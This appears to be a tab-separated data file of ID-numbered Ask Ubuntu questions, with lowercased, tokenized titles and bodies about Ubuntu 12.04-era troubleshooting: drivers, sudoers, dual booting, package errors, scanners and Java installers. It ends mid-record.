173456	how do i get php5 running ?	i have just installed php5 on ubuntu , but it 's not running . how do i get it running ? or more generally , how do i start an application software that does n't have an entry in init.d ?
173457	usb wi-fi netgear wnda3200 `` unable to allocate urbs '' error	i bought wi-fi usb dongle netgear wnda3200 . it 's based on atheros ar7010+ar9280 chipset and it is supported by ath9k_htc driver . i 'm running ubuntu 12.04 with kernel 3.2.0-29-generic ( x86_64 ) . this device is recognized correctly and lsusb shows : bus 008 device 005 : id 0846:9018 netgear , inc. wnda3200 802.11abgn wireless adapter [ atheros ar7010+ar9280 ] but dmesg shows error : usb 8-1 : ath9k_htc : transferred fw : htc_7010.fw , size : 72992 usb 8-1 : ath9k_htc : unable to allocate urbs ath9k_htc : probe of 8-1:1.0 failed with error -22 usbcore : registered new interface driver ath9k_htc there are 3 firmware files in my /lib/firmware ar7010_1_1.fw ar7010.fw htc_7010.fw how to ger rid of error : unable to allocate urbs ? thank you .
173458	svn privilege for newly created user	i am required to create a new user and then svn co into the newly created user 's home directory by calling a bash script from a php page . the below example is a line from the sudoers file which i saw at some other forum . http all=nopasswd : /usr/sbin/useradd , /bin/mkdir , /bin/ln , /bin/chown , /bin/cp , /bin/sed this line obviously sets a passwordless sudo for the user http and adds privileges to the user http to use useradd , mkdir , chown , cp and sedcommands . i would not like to disable the sudo prompt for all users but just for the newly created user ( i had seen an answer regarding commenting a certain line in the sudoers file for preventing the sudo password prompt here at au ) . similarly i would like to add svn privileges onto the www-data user . www-data all=nopasswd : /usr/sbin/useradd , /bin/svn currently the www-data user is able to create a new user using the useradd command , but is unable to use the svn command . ( i may be doing it completely wrong so feel free to correct me ) this is the bash script that i am trying to run . sudo useradd newuser -d /home/newuser -s /bin/bash -m -p password echo yes | sudo svn -- username [ username ] -- password [ password ] co [ svn link ] /home/newuser/public_html when i try to call this script from the php page using the command $ output = shell_exec ( `` sh ./includes/setupsite.sh 2 > & 1 '' ) ; i get the error sudo : no tty present and no askpass program specified for the second line ( the svn co line ) but instead when i try to run without sudo i get -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - attention ! your password for authentication realm : authentication required can only be stored to disk unencrypted ! you are advised to configure your system so that subversion can store passwords encrypted , if possible . see the documentation for details . you can avoid future appearances of this warning by setting the value of the 'store-plaintext-passwords ' option to either 'yes ' or 'no ' in '/var/www/.subversion/servers ' . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - store password unencrypted ( yes/no ) ? svn : ca n't make directory '/home/newuser/public_html ' : permission denied so that made it obvious that sudo might be required . i saw a similar question here itself . but that was not answered and the answer provided did n't solve my issue . update : the file permissions/ownership are : -rwxrwxrwx 1 www-data www-data 326 2012-08-08 17:56 setupsite.sh if you need any clarifications please leave a comment and i 'll edit my question to add those details ( provided that i have them ) asap .
173459	installing/cloning from ubuntu installed and running on usb to hd	i installed ubuntu on to a usb and everything 's running perfectly thus far . i can use it to boot into my desktop as well as laptops . the question i have : - i would like to use the ubuntu on the usb to install/clone ubuntu on to one or more laptops . i 'd also like to have the same software as on my usb installed on the other systems . any changes i have to make to individual system installations , i 'll take care of later . what 's the best/easiest way of copying/cloning/installing a live system from a usb to the hard drive on multiple machines ?
173462	ubuntu browsers trying to make me connect via a proxy that is n't available , how do i stop it wanting to connect to it ?	i recently updated my computer and now it wont ' let me go online . it keeps coming up with the error message ; can not connect to proxy ( slb-webcache.hull.ac.uk ) . how do i get rid of it 's proxy associations ?
173464	is there another way to verify ubuntu 12.04 settings for flash drive handling than system settings ?	i have two identical acer tablet netbooks with ubuntu 12.04 lts installed , and being new to ubuntu , i have tried hard to keep their settings in sync , so i know better through changes if the system breaks or if i break it . i have noticed that when i plug in a usb memory stick , one system mounts the device and opens a folder on the desktop right away , while the other seems to ignore the hardware and nothing happens ( despite the light on the device initially blinking ) . i have gone into system settings - > details - > removable media ( which ubuntu help refers to ) looking for a setting to specify how ubuntu should treat this media , but i have noticed both tablets seem to be set the same way ( although none of the choices seem to explicitly refer to flash drives ) . is there another or more basic way to control how ubuntu treats media and verify those settings than the system settings panel ?
173465	what is dpkg for ?	my question is simple -- i want to know more about dpkg -- what does it do ?
173470	replacing blank character is not working inside script	in a shell script i tried to replace blank space by \n with this command echo -e $ var |tr ' ' '\n' outside the script it workd perfectly but inside there is no effect . this how i use in the script : var = $ ( echo -e $ var | tr ' ' '\n ' ) thanks .
173473	how to create bootable usb from ubuntu	i want create bootable usb stick with windows7 . but ubuntu want to accept windows .iso file and create it . please help : (
173480	intel hd 3000 ubuntu 64-bit 12.04 , how to fix overscan ?	i 'm new to this but my problem is that i am trying to connect my panasonic tc-l32x2 tv to my asus bd3ma laptop through hdmi , because my xbox is occupying my vga port , and even though it supports 1080p through the hdmi cable , it seems to be giving me overscan and unlike in windows , i ca n't seem to find a way to scale the resolution to fit on the physical screen . it seems to be cutting off all four edges if i could find a way to scale down the resolution to about 95 % both vertical and horizontal then i believe that would solve my problem . i am somewhat familiar with xrandr but not familiar with xorg . there are no settings on my tv to adjust this even on the secret menus . my computer is running intel hd3000 or sandy bridge gfx , integrated into my cpu . i 'll post my xrandr output . i 've also tried to set my resolution using xrandr to lower resolutions even 720p but it only seems to cut off more of my screen when i do that . also my tv supports 16:9 and through vga supports resolutions up to 1366x768 i do n't know if that helps but thought i should mention it . sorry if my posting skills are not up to par the code was too long to screen-shot it . screen 0 : minimum 320 x 200 , current 1920 x 1848 , maximum 8192 x 8192 lvds1 connected 1366x768+554+1080 ( 0x45 ) normal ( normal left inverted right x axis y axis ) 344mm x 194mm identifier : 0x41 timestamp : 1606552 subpixel : horizontal rgb gamma : 1.0:1.0:1.0 brightness : 1.0 clones : crtc : 1 crtcs : 1 0 transform : 1.000000 0.000000 0.000000 0.000000 1.000000 0.000000 0.000000 0.000000 1.000000 filter : edid : 00ffffffffffff004ca34a3200000000 00150103802213780ace859e5b4c9426 17505400000001010101010101010101 0101010101017d1e5618510016303020 250058c2100000190000000f00000000 00000000001eb4027400000000fe0053 414d53554e470a2020202020000000fe 00313536415432342d5030310a20001c backlight : 10 ( 0x0000000a ) range : ( 0,10 ) backlight : 10 ( 0x0000000a ) range : ( 0,10 ) scaling mode : full aspect supported : none full center full aspect 1366x768 ( 0x45 ) 78.0mhz -hsync -vsync *current +preferred h : width 1366 start 1414 end 1446 total 1646 skew 0 clock 47.4khz v : height 768 start 770 end 775 total 790 clock 60.0hz 1360x768 ( 0x46 ) 84.8mhz -hsync +vsync h : width 1360 start 1432 end 1568 total 1776 skew 0 clock 47.7khz v : height 768 start 771 end 781 total 798 clock 59.8hz 1360x768 ( 0x47 ) 72.0mhz +hsync -vsync h : width 1360 start 1408 end 1440 total 1520 skew 0 clock 47.4khz v : height 768 start 771 end 781 total 790 clock 60.0hz 1024x768 ( 0x48 ) 65.0mhz -hsync -vsync h : width 1024 start 1048 end 1184 total 1344 skew 0 clock 48.4khz v : height 768 start 771 end 777 total 806 clock 60.0hz 800x600 ( 0x49 ) 40.0mhz +hsync +vsync h : width 800 start 840 end 968 total 1056 skew 0 clock 37.9khz v : height 600 start 601 end 605 total 628 clock 60.3hz 800x600 ( 0x4a ) 36.0mhz +hsync +vsync h : width 800 start 824 end 896 total 1024 skew 0 clock 35.2khz v : height 600 start 601 end 603 total 625 clock 56.2hz 640x480 ( 0x4b ) 25.2mhz -hsync -vsync h : width 640 start 656 end 752 total 800 skew 0 clock 31.5khz v : height 480 start 490 end 492 total 525 clock 59.9hz vga1 disconnected ( normal left inverted right x axis y axis ) identifier : 0x42 timestamp : 1606552 subpixel : unknown clones : crtcs : 1 0 transform : 1.000000 0.000000 0.000000 0.000000 1.000000 0.000000 0.000000 0.000000 1.000000 filter : hdmi1 connected 1920x1080+0+0 ( 0xcc ) normal ( normal left inverted right x axis y axis ) 698mm x 392mm identifier : 0x43 timestamp : 1606552 subpixel : unknown gamma : 1.0:1.0:1.0 brightness : 1.0 clones : crtc : 0 crtcs : 1 0 transform : 1.000000 0.000000 0.000000 0.000000 1.000000 0.000000 0.000000 0.000000 1.000000 filter : edid : 00ffffffffffff0034a906c301010101 00140103800000780adaffa3584aa229 17494b00000001010101010101010101 010101010101023a801871382d40582c 4500ba882100001e011d8018711c1620 582c2500ba882100009e000000fc0050 616e61736f6e69632d54560a000000fd 00173d0f440f000a2020202020200150 02031e71499005200403020706012309 070167030c001000b82de3050301011d 007251d01e206e285500ba882100001e 8c0ad08a20e02d10103e9600ba882100 00188c0ad08a20e02d10103e96000b88 210000188c0aa01451f01600267c4300 ba88210000988c0aa01451f01600267c 43000b882100009800000000000000b5 broadcast rgb : full supported : full limited 16:2 audio : auto supported : off auto on 1920x1080 ( 0xcc ) 148.5mhz +hsync +vsync *current +preferred h : width 1920 start 2008 end 2052 total 2200 skew 0 clock 67.5khz v : height 1080 start 1084 end 1089 total 1125 clock 60.0hz 1280x720 ( 0xcd ) 74.2mhz +hsync +vsync h : width 1280 start 1390 end 1430 total 1650 skew 0 clock 45.0khz v : height 720 start 725 end 730 total 750 clock 60.0hz dp1 disconnected ( normal left inverted right x axis y axis ) identifier : 0x44 timestamp : 1606552 subpixel : unknown clones : crtcs : 1 0 transform : 1.000000 0.000000 0.000000 0.000000 1.000000 0.000000 0.000000 0.000000 1.000000 filter : broadcast rgb : full supported : full limited 16:2 audio : auto supported : off auto on
173481	amd e1-1200 slow ?	i recently installed ubuntu 12.04 32bit with gnome 3 on a toshiba 850d-104 for a friend of mine . this friend only surfs the web , checks for emails and plays online flash games a lot i was chocked to see that the laptop was rather sluggish . i mean you get what you pay for , with this kind of processor ( amd e1-1200 , dual-core 1.4ghz ) , but it 's a bit too much ! it takes 10 seconds to just open up chromium ( 1 tab ! ) not to mention when he plays a flash-game it 's stuttery and becomes unplayable . what can i do ? i already tried lubuntu , but it 's not that much faster . i checked the resources and the ram is only 300mb from the 6gig installed ? the graphics card is a amd hd radeon 7310 ( and the fglrx-driver is installed ) any solutions for a sluggish flash experience on ubuntu ? thanks
173491	still ca n't shut down , also experiencing random full freezes	after exploring for solutions across this website and through the use of google , i have not found a fix for my inability to shut down ; i am still forced to do a hard shut down by holding down my power button . i have tried every `` solution '' i have come across , including editing a file in gedit , using sudo commands to attempt to shut down and trying to locate any errors whilst shutting down ; all of which failed . i am however able to restart properly . i 've also been experiencing random full freezes where i am unable to move my mouse or do anything else , i am using intel hd 4000 graphics , so there are no drivers installed . if there are any other possible solutions , i would be very grateful for some help . thanks !
173495	installing ubuntu on second hard with windows on the other , but how ?	i have 2 hard drives and it appears that windows is installed on sdb1 , however i wish to install ubuntu ( lubuntu with unity ) on sda , sda1 or sda2 im not sure of . i unplugged sdb and windows loader still appeared and said windows was not working , which means windows loader is installed on sda1 which has 104mb , does this mean i can install ubuntu straight onto sda2 ? and what about `` device for boot loader installation '' do i have to change that option ? -just to make clear i want windows boot loader so i can decide which os to chose , which means i do n't want windows harmed at all . is this possible ? thank you .
173496	alternative to sudo add-apt-repository ppa : upubuntu-com/web	i found this steps to install soapui : http : //www.upubuntu.com/2012/04/how- ... b-service.html but i can not connect because a proxy . traceback ( most recent call last ) : file `` /usr/bin/add-apt-repository '' , line 125 , in ppa_info = get_ppa_info_from_lp ( user , ppa_name ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/ppa.py '' , line 80 , in get_ppa_info_from_lp curl.perform ( ) pycurl.error : ( 7 , `` could n't connect to host '' ) i dont have problems with apt-get update , so is there any way to install soapui modifying sources.list ? regards javi
173499	skip run confirmation	when i run a script via gui , e.g . in python , i get dialog asking me to confirm that i want to run it or display it . is there a way i can set this not to happen , and to run it straight from click ?
173505	how do i make thunderbird 's reply format look like outlook 's ?	i am using thunderbird 14.0 , where i am facing few issue . is it possible to make thunderbird look like outlook . i did n't mean the theme or look , i mean the way that how outlook express replies . it has a neat line on the end of every reply , where as thunderbird doesnot do the way like outlook does . it does n't show the details of from , to subject & date while replying..i just to overcome this issue by customizing the settings or i just want to know is there any other email client which serves like outlook for ubuntu ? thanks in advance . please share your answers.. outlook screenshot : thunderbird screenshot : update - 1 : update - 2 : outlook express / outlook has a nice look on forwarding mails . like it highlights the from field in light grey color . pls find the snapshot below . how to get this style in thunderbird on forwarding mails ? update - 3 : can i have the below style ? all the informations should be highlighted in light grey color , like the one on screenshot below . also i dont want the email id to be displayed , on mouse over it should show the email id like outlook . you can find it in below screenshot . update - 4 : help me in adding signature for all outgoing mails .
173506	is there any other way to do a clean install withot formatting /home ?	i think my ubuntu is a bit broken from messing around with it . unfortunately during installation , i did not make a separate partition for /home . now i need to re-install but want to keep my music and films . any ideas ...
173511	built python 2.7.3 from source , now apt-get does n't work `` importerror : no module named apt_pkg ''	i needed to get a bug fix which arrived in python 2.7.3 latest version available for 11.10 was 2.7.2 , so i built python 2.7.3 from source now when i try to apt-get [ anything ] i get this error at the end : setting up unattended-upgrades ( 0.73ubuntu1 ) ... update-rc.d : warning : unattended-upgrades start runlevel arguments ( 2 3 4 5 ) do not match lsb default-start values ( none ) update-rc.d : warning : unattended-upgrades stop runlevel arguments ( 0 1 6 ) do not match lsb default-stop values ( 0 6 ) checking for running unattended-upgrades : traceback ( most recent call last ) : file `` /usr/share/unattended-upgrades/unattended-upgrade-shutdown '' , line 27 , in < module > import apt_pkg importerror : no module named apt_pkg invoke-rc.d : initscript unattended-upgrades , action `` start '' failed . dpkg : error processing unattended-upgrades ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : unattended-upgrades e : sub-process /usr/bin/dpkg returned an error code ( 1 ) since this error is python related i assume i have broken some part of apt by installing a new python . although i installed to /usr/local/bin and have n't touched the /usr/bin/python , which is still the 2.7.2 version that came with ubuntu . very grateful if someone can suggest a way out of the mess i 'm now in , preferrably without reinstalling the os .
173516	matlab 2012a installation ubuntu 12.02 issue	i 'm trying to install matlab2012 on my ubuntu machine , and , in order to do that i have to give the installation program the root rights , this is what i 've tried : root @ engine : /media/engine # ./install bash : ./install : permission denied i 've tried also gsku : root @ engine : /media/engine # gksu ./install nothing happens . thanks for your help !
173519	how do i download an ubuntu 12.04 image with all updates so far ?	if i would like to install 12.04 on september 2012 on several machines , is it possible to get an image with all the latest updates so far , so that i do n't have to download and install the updates after installation ?
173523	ubuntu suggestion to dual boot with windows in a lightweight pc	i 'm using widows xp ( 32 bit ) . the hardware details for my computer are : pentium 4 cpu 1.6 ghz , 1 gb ram , 80 gb hard disk . no graphics card is ubuntu 9.10 will be a best option in dual booting for my computer ?
173524	unity applications lens is empty	i am using unity on ubuntu 12.04 . for some time now , the applications lens is completely empty when i open it . if i search for any applications from the home or applications lens , no results show up . i have tried killing and launching the applications lens as suggested at launchpad , but it did not work . how can i get the applications lens to work again ?
173526	unable to install amd radeon 7670m graphics driver on 12.04	i ca n't configure the graphics driver for radeon 7670m hd for 12.04 . i installed latest catalyst control center 12.06 , it shows me that the hardware does n't match the driver . how can i install driver for my graphics card ?
173527	installing ubuntu from usb stick	i have used the program `` universal usb installer '' to 'save ' ubuntu on my usb stick . so far - good . when i boot it , i get these options : , but on a totally black screen and i ca n't use them . i choose to install , then it goes to completely black screen and nothing happens . no install , nothing . i restart and try again - same thing . can someone tell me how to properly install it ? i 'm trying to install desktop version 12.04 amd64 . pc specs : processor - intel core i3-2130 memory - 4 gb ram current os - windows 7 x64
173531	how do i disable my talking login screen ?	managed to clip a shortkey that enabled some audio assistance program on my ubuntu login screen ( it reads back to you anything you click or type ) . it 's really annoying , but i ca n't seem to find any documentation that will help me disable it does anyone know how i might disable this ?
173533	how can i repair an install that has been crossed with mint lisa ?	i was annoyed when i found out that ubuntu 11.10 oneric ocelot did n't allow installation of gnome 2 , so i decided to get the closest thing that still has support : mint 12 lisa 's mate interface . i added lisa repositories and installed mate based on the instructions here : http : //www.addictivetips.com/ubuntu-linux-tips/install-linux-mint-mate-desktop-in-ubuntu-11-10/ . when it refused to run on my computer , i uninstalled it . but then i realized that my system was confused by the addition of the lisa repos ( it even thinks it is lisa ) . strange glitches started happening , so i removed the repositories . now i 'm finding that when i try to force the versions of packages back to oneric , synaptic thinks i 'm trying to uninstall them , and keeps recommending packages for i386 ( i 'm using amd64 ) . does anyone know how to restore my system without re-installing the os or risking actual damage ? right now most of it works at least well enough for me to tolerate , but some less-important parts are completely unusable .
173534	how do i get my photo scanner working ?	i am having trouble getting my epson perfection v100 photo scanner to run under ubuntu 12.04 . after i changed my desktop it seems that i ca n't install the epson scanner . does anybody has an idea how i can fix this problem ?
173536	where can i find and examine apt packages online	i 've installed samba4 beta 5 from sources . as a result there are some files missing that would be present in the apt package for ubuntu . /etc/default/samba4 for example . i 'd like to just copy these in from the apt package for samba4-alpha-18 . where can i find/examine the contents of this apt package ?
173541	do i need an additional hard drive to install ubuntu on windows 7 ?	i have a recently built a pc w/ windows 7 64-bit and i want to run a second drive with ubuntu on it . i have a 1tb drive . i 'm going to install in my computer . can i install ubuntu on the 2nd drive ? if that works can i switch between ubuntu and windows 7 at startup ?
173553	do i need to have java ( icedtea ) installed on my machine ?	do i need to have java installed on my machine ? the website ( blackboard ) that my school uses says that i need to have java installed , but everything seems to be working fine without it . running ubuntu 12.04 64bit , default firefox browser .
173555	install malayalam true type fonts	how to install malayalam windows fonts ( .ttf ) in my ubuntu 12.04 using to create douments with libre office , gimp etc .
173556	ca n't change permissions of files in home folder without sudo	for some reason , i ca n't chmod +x files that are right in my home folder without prepending sudo to the command . one recent example : i have a file named monitor-off.sh in ~/documents . i tried to use this command at the terminal and received this message : david @ my-pc : ~/documents $ chmod +x ./monitor-off.sh chmod : changing permissions of `./monitor-off.sh ' : operation not permitted however , when i prepended sudo to the beginning , it worked : david @ my-pc : ~/documents $ sudo chmod +x ./monitor-off.sh david @ my-pc : ~/documents $ ls -lh total 28k ... ( files ) ... -rwxr-xr-x 1 root root 44 aug 8 15:32 monitor-off.sh ... ( files ) ... i know that i should n't be overusing sudo like this , so what can i do to fix things so that i can use chmod without sudo ?
173559	format external hard drive	i 'm trying to format an external hard drive ( iomega 1tb ) using disk utility but when but when i select format volume or format drive , it shows me the error : error creating file system : helper exited with exit code 1 : error calling fsync ( 2 ) on /dev/sdb1 : input/output error i tried with gparted too , but it does n't find the drive . can anyone give me some hint ? thanks in advance . p.s : i tried in windows , but it does n't work too . it says that i do n't have write permission .
173566	`` gnutls error : a tls packet with unexpected length was received . '' when mointing with ifuse	i use a macbook pro 3.1 with ubuntu 10.04 as single boot ; i have also added the ppa : pmcenery/ppa to have the last updated library to use ipod and co. , and upgraded the whole system . i have some trouble trying to mount my ipod touch because nautilus does not auto-mount it . i tried to manually mount it using ifuse : r @ mbp : ~ $ sudo mkdir /media/ipod r @ mbp : ~ $ sudo ifuse /media/ipod/ when i tried to open the ipod icon on the desktop i have : access was denied ! so , to browse the ipod i have to use : r @ mbp : ~ $ gksudo nautilus doing this i can not oped ipod in rhythmbox . i also tried to change the permission of the mounting point : r @ mbp : ~ $ sudo chmod 777 /media/ipod but nothing changes . i also tried to use ifuse without sudo but i have this error : r @ mbp : ~ $ ifuse /media/ipod gnutls error : a tls packet with unexpected length was received . do you have any further suggestion ? ?
173567	can i make my desktop background active ?	i want my desktop background to look like the chrome extension , currently . how would i accomplish this ?
173568	using awk or similar to find the next word in the output of another command	i am trying to determine the startsector of a .img file from within a bash script so it can be correctly mounted from within the script . i have been using the file command to easily find the startsector - how ever i 'm not sure how to extract that number from the output . i think the answer lies with using awk but i can not for the life of me fathom out how to do it . here is the output of the file command for reference : kemra102 @ kaon : ~/downloads $ file 2012-07-15-wheezy-raspbian.img 2012-07-15-wheezy-raspbian.img : x86 boot sector ; partition 1 : id=0xc , starthead 130 , startsector 8192 , 114688 sectors ; partition 2 : id=0x83 , starthead 165 , startsector 122880 , 3665920 sectors , code offset 0xb8 kemra102 @ kaon : ~/downloads $
173578	is the ubuntu kernel modular ?	i 've done a couple of google searches , but i ca n't seem to come across an answer , at least not within the first two search pages . i wanted to know whether the ubuntu kernel is modular or monolithic ? i saw one article which said that most of todays distros are highly modular , but nothing specific enough to mention the specific ones . just something of interest and wanted to know !
173579	how do i fix desktop that freezes straight after boot ?	i was able to install but upon booting up after 5-10 sec the system runs extremely slow and locks up to the point where i have to hard reset ... not sure what to do ... i tried a different .iso and tried on a disc and i was able to enter safe mod and go to root command line and run fix packages , everything seems to download and install correctly but once i get back to the desktop it freezes and hard lock up occurs again ... disabling my wireless seems to delay this from happening not sure why any advice on where to go from here ? computer : toshiba s855d-00u
173582	how to best copy large files to an sd card ?	when copying large ( or even files of a few kb ) to an sd card from ubuntu 10.10 , the files appear to be there but when i access the card from another device , the files are either missing or 0 bytes in size . i suspect that the problem is that it takes time for the files to copy to the card and i 'm taking it out too soon but there is no progress bar - im just doing it from cmd line . and it even happens when i cleanly eject the card . is there a preferred way to do this so i can know that the files are copied ?
173585	new internal hard drive and ubuntu os	i have a very crappy acer aspire and i can to switch out the internal hard drive for a better one . what 's the easiest way to get ubuntu on the new drive if it does n't have an os at all and the acer came with no reboot cds ?
173588	how to safely remove ubuntu 12.04 from a dual-boot installation with windows xp ?	i have an acer netbook with windows xp on it . i had installed ubuntu 12.04 ( actually upgraded from 10. ? ? to 11.04 to 11.10 and on to 12.04 ) i want to remove ubuntu 12.04 and try some other previous version or kubuntu or lubuntu because i am finding 12.04 slow and the read/writes to usb devices ( whether flash or ext hdd ) terribly slow . i just ca n't use it this way . i found a bunch of info on how to remove ubuntu safely . but that involved installing easybcd and when i installed it , it told me that it can not find the bcd registry and that it would work only on vista and windows 7 . in my understanding , uninstalling/removing ubuntu safely involves 2 or 3 steps . 1 . fix mbr 2. delete the linux partition 3 . expand the windows partition to use the unallocated disk space ( got from deleting the linux partition ) . in order to fix the mbr , i used the following commmand that i found here . sudo lilo -m /dev/sda mbr i created a bootable usb stick with 11.04 and booted the netbook with it and then did the above command . after that rebooted the pc , chose to boot windows ( from the windows multiboot menu - the grub menu was gone as a result of the above lilo command i assume ) . then i did diskmgmt.msc and deleted the linux partition ( sda3 ) . but i was not able to resize the windows partition ( sda2 ) since windows xp does not have that option . i tried using gparted to do the resizing as mentioned here , but that somehow did not work . that is - the sda2 showed up as 87.72 gb and it did not allow me to increase the size to include the 47.23 gb space that is unallocated as a result of deleting the linux partition . now , when i boot , it still shows me 'ubuntu ' in the windows multiboot menu . is there a way i can get rid of it so that it only shows windows ? i am going to install 11.04 , but i would still be able to resize the unallocated space so that i could try another version as well which allows me to use usb hdd at a decent speed . thanks
173590	why does my unity music lens not play anything ?	my music lens in 12.04 unity will access my entire library , but if i click on anything to play it , rhythmbox opens and does nothing .
173596	aircrack-ng channel hopping issue	i can not stop channel hopping on latest ubuntu , on aircrack website it sais that newotk managers or similar programs cause this ... when launching airmon-ng it warns me that processes like dhcpi , network-manager can cause problems . i tried to kill these processes with sudo kill -9 pid but the processes are immediately restarted . i am using the ath9k driver .
173598	what mail server does ubuntu have installed by default ?	what mail server does ubuntu 12.04 have installed by default , or is there one ?
173602	is there a device manager for ubuntu ?	i 'm looking for a debian/ubuntu package that serves as a device manager , an application that allows me to see and modify hardware on my machine ( ie . hard drives , network cards , etc . ) through a visual interface . i searched for one and found gnome-device-manager , however it seems to have been discontinued and is removed from the official repositories . i also searched the ubuntu software centre but could not find any . does anybody know any alternatives i can use ?
173611	inconsistent behaviour of applications and launcher	this is a question that involves multiple issues involved in creating a menu tied to a launcher icon . i 'm using a fresh install of 12.04 ( amd64 version ) . i 've written a small yad ( yet another dialog editor ) script which displays a dialog containing several choices for launching a set of related programs . some are applications installed normally using the ubuntu software center and some are java programs called by commands of the form java -jar jarfilename.jar . if i launch an application by clicking on a desktop file in /usr/share/applications it launches and puts an icon in the launcher until i close the application . the same happens if i run them from the command line in a terminal . however if i call them using an exec command in the script they launch by there is no new icon in the launcher . they run fine , but if i have more than one open on different desktops it would be nice to have the icons in the launcher to switch focus rather than having to use the workplace switcher . now about the java apps -- i 'd like them to also have icons on the launcher when they 're running . running them by clicking on an appname.desktop file with the icon specified works , but what is the correct syntax for running them with the bash script exec command ?
173613	sudoers syntax different for server vs desktop ?	is there a difference in syntax between the server and desktop ubuntu 12.04 distro ? if so could i get help rewriting this line to be valid for the desktop env ? user1 ant = ( user1 ) nopasswd : ~/progs/tool/start.sh the start.sh script should be executable from an ant target initiated by user1 ... thanks
173615	`` an uncaught exception was raised : invalid version string 'gnu/linux ' '' when creating bootable usb stick	still unsolved bug here and bug -report here , bug in 12.04 and apparently in many other versions . how can i create an bootable usb -stick with ubuntu ?
173616	how does deja-dup react to whole folders being moved ?	does deja-dup have some mechanism to detect when i 've moved a complete folder into a new subfolder ? or will it copy all the files in the folder again ? i 'm talking about folders that contain some 100 gb of data , so if i do something the wrong way several times , my backup drive could easily run out of space without really needing to .
173617	can i use ubuntu and windows 7 simply by using the windows installer on ubuntu.com ?	when i 'm done using windows/ubuntu , can i just reboot and select the other from the boot menu ?
173618	what does the number in brackets in a command mean ?	often , i read something like command time ( 1 ) or printf ( 3 ) . what do the numbers in the brackets stand for ?
173629	ocaml with threads	i already have the ocaml language working in my ubuntu 12.04 installation , but i do n't believe that it comes with the threads library . does anyone know i can get threads working ?
173631	change command name in terminal	i use the sublime text 2 text editor for developing in ubuntu . when i want to open a file form the command line , i need to type sublime-text-2 < file-name > . i would like to be able to tab after sub to get that , but there is sublime-text and subl or something that which also auto-complete . is there a way to change or create an alias for the name sublime-text-2 and call it 'sub ' or just 'sublime ' or even something completely different like 'texta ' ?
173632	error when booting from live cd	i am attempting to install ubuntu 12.04 on what used to run windows xp . the original os is all but dead , so i am booting off of a cd created from the iso download . depending on the time , i either fail to reach the menu allowing to install ubuntu , or i select the install ubuntu option . regardless of this , every time i reach the ubuntu 12.04 screen with 4 dots . when i use the shift+f6 shortcut , i receive the following error : stdin : i/o error stdin : i/o error unable to open '/dev/zram0' i have never worked with any sort of linux before , so i 'm quite clueless as to what this means , or how to work around it . is there something i 'm missing , or is it a hardware issue ?
173641	why is flash video trying to play across both displays ?	this did n't always happen but flash tries to play video across both displays . any ideas how to fix this ?
173643	is there a simple recipe for listening to rtl2832u fm-radio ?	this is on ubuntu 12.04 - i installed the dvb-realteck-rtl2832u-2.2.2-10tuner-mod_kernel package , i installed gnuradio , i installed the rtl_fm and i just keep getting more and more confused -- i recognize that this device can monitor police radio , digital fm , weather channels , you name it , but all i really need is to run a simple command line and hear a plain ordinary fm station streaming through my speakers . the closest so far is the command : rtl_fm -f 96.3e6 -s 48000 - | aplay -r raw -f dat -c 1 but the sound quality is atrocious . any and all guesses or pointers to resources are welcome . i have n't been able to find anything through the google searches that gets me any closer to a nice clean stereo fm signal . gnuradio seems completely intractable although i am certain that , once one figures out what it is that it does , it makes perfect sense ; )
173647	identical notification bubbles keep re-appearing	i have just recently noticed this problem occurring . when i receive an email , the on-screen notification bubbles 'keep popping up ' . by this , i mean it will pop-up and tell me i have received an email , then it will disappear , and an identical bubble , telling me about the same email , will pop-up again . this will happen anywhere between 4-9 times . as you can imagine , it is getting pretty annoying , especially considering the volume of emails one receives these days . i have ubuntu 12.04 , and have installed notify-osd , but have only used it to change the position and 'click to dismiss ' properties of the bubbles . i have thunderbird ( with my gmail account in it ) and lightning installed ( but only use tb to interact with my gmail calendar ) . i also use chromium to check my gmail . has anyone got any ideas of what may be causing this ? is it a chromium extension problem , or a thunderbird problem , or an os/notification daemon problem ? cheers , dave
173648	recover the package manager after crash during update	my so frequently crashing 12.04 system responded with a kernel freeze during my last package update . which did result in malfunction package manger that describes the error as such : `` error : brokencount > 0 '' ... can the package manager be recovered in some way ?
173652	i ca n't get xsane to work in lubuntu 12.04	xsane does not see my scanner ( part of a lexmark all-in-one s350 ) . it worked fine , using ubuntu 10.04 . printing works fine . the all-in-one printer is wireless . the router sees it . i can ping it . i can view it on the lan via a browser and the local ip address . i did get a new computer , but i think the difference is that xsane that installs with synaptic is now 0.968 . the previous setup used 0.966 .
173654	trying to install java jdk every time i install/remove anything	i have installed java jdk following this tutorial : http : //www.duinsoft.nl/packages.php ? t=en the installation was ok but every time i install or uninstall anything , i get this message : downloading ... -- 2012-08-08 22:12:26 -- http : //download.oracle.com/otn-pub/java/jdk/7u3-b04/jdk-7u3-linux-x64.tar.gz resolving download.oracle.com ... 201.48.47.25 , 201.48.47.27 connecting to download.oracle.com|201.48.47.25|:80 ... connected . http request sent , awaiting response ... 302 moved temporarily location : https : //edelivery.oracle.com/otn-pub/java/jdk/7u3-b04/jdk-7u3-linux-x64.tar.gz [ following ] -- 2012-08-08 22:12:26 -- https : //edelivery.oracle.com/otn-pub/java/jdk/7u3-b04/jdk-7u3-linux-x64.tar.gz resolving edelivery.oracle.com ... 23.62.50.174 connecting to edelivery.oracle.com|23.62.50.174|:443 ... connected . http request sent , awaiting response ... 302 moved temporarily location : http : //download.oracle.com/errors/download-fail-1505220.html [ following ] -- 2012-08-08 22:12:27 -- http : //download.oracle.com/errors/download-fail-1505220.html connecting to download.oracle.com|201.48.47.25|:80 ... connected . http request sent , awaiting response ... 200 ok length : 5307 ( 5.2k ) [ text/html ] saving to : `./jdk-7u3-linux-x64.tar.gz' 0k ... .. 100 % 416k=0.01s 2012-08-08 22:12:27 ( 416 kb/s ) - `./jdk-7u3-linux-x64.tar.gz ' saved [ 5307/5307 ] download done . sha256sum mismatch jdk-7u3-linux-x64.tar.gz oracle jdk 7 is not installed . dpkg : error processing oracle-java7-installer ( -- configure ) : subprocess installed post-installation script returned error exit status 1 setting up firefox ( 14.0.1+build1-0ubuntu0.11.10.1 ) ... please restart all running instances of firefox , or you will experience problems . setting up firefox-globalmenu ( 14.0.1+build1-0ubuntu0.11.10.1 ) ... errors 